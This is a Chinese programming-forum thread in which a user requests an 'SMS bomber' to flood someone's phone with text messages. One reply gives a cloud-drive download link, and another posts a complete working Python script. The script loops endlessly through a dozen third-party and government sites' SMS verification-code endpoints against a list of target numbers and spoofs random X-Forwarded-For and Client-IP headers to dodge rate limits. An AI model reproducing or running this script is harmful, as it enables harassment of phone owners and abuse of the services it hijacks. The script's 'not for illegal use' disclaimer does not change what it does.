鱼C论坛

 找回密码
 立即注册
查看: 5247|回复: 6

求一款短信轰炸机

[复制链接]
发表于 2017-10-14 10:40:12 | 显示全部楼层 |阅读模式
99鱼币
求一款短信轰炸机,谢谢

想知道小甲鱼最近在做啥?请访问 -> ilovefishc.com
回复

使用道具 举报

发表于 2017-10-14 11:09:17 | 显示全部楼层
额,这个算不算违规
想知道小甲鱼最近在做啥?请访问 -> ilovefishc.com
回复

使用道具 举报

发表于 2017-10-19 16:00:37 | 显示全部楼层
兄弟没用的,别人一开飞行模式就没事了,别气坏自己啊,,,,哈哈哈
想知道小甲鱼最近在做啥?请访问 -> ilovefishc.com
回复

使用道具 举报

发表于 2017-10-20 15:33:03 | 显示全部楼层
兄弟没用的,别人一开飞行模式就没事了,别气坏自己啊,,,,哈哈哈
想知道小甲鱼最近在做啥?请访问 -> ilovefishc.com
回复

使用道具 举报

发表于 2021-1-19 15:38:21 | 显示全部楼层
链接:https://pan.baidu.com/s/1jAbU91yJZ_-2UikLSo6sGg
提取码:h0w6
复制这段内容后打开百度网盘手机App,操作更方便哦
想知道小甲鱼最近在做啥?请访问 -> ilovefishc.com
回复

使用道具 举报

发表于 2021-5-25 16:44:42 | 显示全部楼层
材料来源于网络,如果满意请选我


  1. #!/usr/bin/python
  2. # -*- coding: utf-8 -*-
  3. # 不可用于非法用途,使用本程序所产生的后果,与本人概不相关。

  4. import requests
  5. import re
  6. import threading
  7. import os
  8. import random
  9. import socket
  10. import struct
  11. import time

  12. #API接口初始化,按照手机号生成不同的网址
  13. def initAPI(phone):
  14.     # 短信接口API 请求间隔时间 备注 请求方式 请求参数 需要SESSION的先决请求URL以及Referer
  15.     APIList = [
  16.         ["https://login.ceconline.com/thirdPartLogin.do", 60, "世界经理人", "POST",
  17.          {"mobileNumber": phone, "method": "getDynamicCode", "verifyType": "MOBILE_NUM_REG", "captcharType": "",
  18.           "time": str(int(time.time() * 1000))}, ""],

  19.         ["http://www.ntjxj.com/InternetWeb/SendYzmServlet", 120, "机动车手机绑定", "POST", {"sjhm": phone},
  20.          "http://www.ntjxj.com/InternetWeb/regHphmToTel.jsp"],

  21.         ["https://www.itjuzi.com/api/verificationCodes", 60, "IT橘子", "POST", {"account": phone}, ""],

  22.         ["http://yifatong.com/Customers/gettcode", 60, "易法通", "GET",
  23.          {"rnd": ("%0.3f" % (time.time())), "mobile": phone},
  24.          "http://yifatong.com/Customers/registration?url="],

  25.         ["http://qydj.scjg.tj.gov.cn/reportOnlineService/login_login", 60, "天津企业登记", "POST",
  26.          {'MOBILENO': phone, 'TEMP': 1},
  27.          ""],

  28.         ["http://www.shijiebang.com/a/mobile/vcode/", 120, "世界邦", "GET", {'key': phone},
  29.          "http://www.shijiebang.com/reg/"],

  30.         [
  31.             "http://reg.ztgame.com/common/sendmpcode?source=giant_site&nonce=&type=verifycode&token=&refurl=&cururl=http://reg.ztgame.com/&mpcode=&pwd=&tname=&idcard=",
  32.             60, "巨人网络", "GET", {'phone': phone}, "http://reg.ztgame.com/"],

  33.         ["http://www.homekoo.com/zhixiao/zt_baoming_ajax_pc_new.php", 180, "尚品宅配", "POST",
  34.          {"action": "OK", "username": "吕布", "tel": phone, "qq": "", "province": "", "city": "", "kehu_tel_time": "",
  35.           "tg_id": "296", "sp_type": "986", "num_id": "5",
  36.           "zhuanti_pages": "http://www.homekoo.com/zhixiao/cuxiao/index.php", "prevurl": ""},
  37.          "http://www.homekoo.com/zhixiao/cuxiao/index.php"],

  38.         ["http://jrh.financeun.com/Login/sendMessageCode3.html", 60, "金融号", "GET", {"mobile": phone, "mbid": "197858"},
  39.          "http://jrh.financeun.com/Login/jrwLogin?web=jrw"],

  40.         ["https://www.decathlon.com.cn/zh/ajax/rest/model/atg/userprofiling/ProfileActor/send-mobile-verification-code",
  41.          30,
  42.          "迪卡侬", "POST", {"countryCode": "CN", "mobile": phone}, "https://www.decathlon.com.cn/zh/create"],

  43.         ["http://cta613.org/sendsms.php", 60, "支教", "POST", {"y": "1", "sj": phone}, ""],

  44.         ["http://sns.qnzs.youth.cn/ajax/passportSendSms", 120, "青年之声", "POST", {"mobile": phone},
  45.          "http://sns.qnzs.youth.cn/user/passport"]
  46.     ]
  47.     return APIList

  48. # 短信初始化
  49. class initSMS(object):
  50.     """docstring for initSMS"""

  51.     def __init__(self):
  52.         super(initSMS, self).__init__()
  53.         self.SMSList = []
  54.         self.intervalInfo = 0

  55.     def initBomb(self,APIList):
  56.         for x in APIList:
  57.             self.intervalInfo += 1
  58.             self.SMSList.append(SMSObject(x[0], x[1], x[2], x[3], x[4], x[5], self.intervalInfo))
  59.         return self.SMSList


  60. class SMSObject(object):
  61.     """docstring for SMSObject"""  # __var 私有成员变量

  62.     def __init__(self, url, interval, info, method, params, others, intervalInfo):
  63.         super(SMSObject, self).__init__()
  64.         self.__url = url
  65.         self.__interval = interval
  66.         self.__info = info
  67.         self.__intervalInfo = intervalInfo
  68.         self.__method = method
  69.         self.__params = params
  70.         self.__others = others

  71.     def getUrl(self):
  72.         return self.__url

  73.     def getInfo(self):
  74.         return self.__info

  75.     def getParams(self):
  76.         return self.__params

  77.     def getMethod(self):
  78.         return self.__method

  79.     def getOthers(self):
  80.         return self.__others

  81.     def getInterval(self):
  82.         return self.__interval

  83.     def getintervalInfo(self):
  84.         return self.__intervalInfo

  85.     def setintervalInfo(self, intervalInfo):
  86.         self.__intervalInfo = intervalInfo


  87. class Bomb(object):
  88.     """docstring for Bomb"""

  89.     def __init__(self):
  90.         super(Bomb, self).__init__()
  91.         self.HEADERS = {
  92.             'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.81 Safari/537.36',
  93.             'Referer': 'http://10.13.0.1',
  94.             'accept-encoding': 'gzip, deflate, br',
  95.             'accept-language': 'zh-CN,zh-TW;q=0.8,zh;q=0.6,en;q=0.4,ja;q=0.2',
  96.             'cache-control': 'max-age=0',
  97.             "X-Requested-With": "XMLHttpRequest"
  98.         }

  99.     def send(self, SMS):
  100.         # return "SUCCESS"
  101.         IP = socket.inet_ntoa(struct.pack('>I', random.randint(1, 0xffffffff)))
  102.         self.HEADERS['X-FORWARDED-FOR'] = IP
  103.         self.HEADERS['CLIENT-IP'] = IP
  104.         try:
  105.             session = requests.Session()
  106.             if SMS.getOthers() != "":
  107.                 session.get(SMS.getOthers(), timeout=5, headers=self.HEADERS)
  108.                 self.HEADERS['Referer'] = SMS.getOthers()
  109.             if SMS.getMethod() == "GET":
  110.                 req = session.get(SMS.getUrl(), params=SMS.getParams(), timeout=5, headers=self.HEADERS)
  111.             else:
  112.                 req = session.post(SMS.getUrl(), data=SMS.getParams(), timeout=5, headers=self.HEADERS)
  113.         # print(req.url)
  114.         except Exception as e:
  115.             return str(e)
  116.         return "已发送"



  117. if __name__ == '__main__':
  118.     # 手机号列表,如 ["12345678987","98765432123"]
  119.     phoneList=["8888888888"]
  120.     bombNum=1
  121.     while True: # 死循环
  122.         currTime=0
  123.         print("\n第",bombNum,"次轰炸!!!","\n")
  124.         bombNum+=1
  125.         for phone in phoneList: #遍历每个手机号
  126.             APIList=initAPI(phone) # API接口初始化
  127.             print("\n电话:", phone)
  128.             SMSList = initSMS().initBomb(APIList=APIList)
  129.             switchOn = Bomb()
  130.             i = 0
  131.             currTime = 0
  132.             while True:
  133.                 currTime += 1
  134.                 # print(currTime)
  135.                 for x in SMSList:
  136.                     if x.getintervalInfo() == 0:
  137.                         i += 1
  138.                         info = switchOn.send(x)
  139.                         print(str(i) + "." + x.getInfo() + " " + info)
  140.                         x.setintervalInfo(x.getInterval())
  141.                     else:
  142.                         x.setintervalInfo(x.getintervalInfo() - 1)
  143.                 time.sleep(5) #设置两次轰炸的间隔时间,单位是秒
  144.                 if i==len(APIList):
  145.                     break
复制代码
想知道小甲鱼最近在做啥?请访问 -> ilovefishc.com
回复

使用道具 举报

发表于 2021-7-8 16:15:31 | 显示全部楼层
尽梨了诗败了 发表于 2021-5-25 16:44
材料来源于网络,如果满意请选我

哪个软件
想知道小甲鱼最近在做啥?请访问 -> ilovefishc.com
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|手机版|Archiver|鱼C工作室 ( 粤ICP备18085999号-1 | 粤公网安备 44051102000585号)

GMT+8, 2024-3-30 11:30

Powered by Discuz! X3.4

© 2001-2023 Discuz! Team.

快速回复 返回顶部 返回列表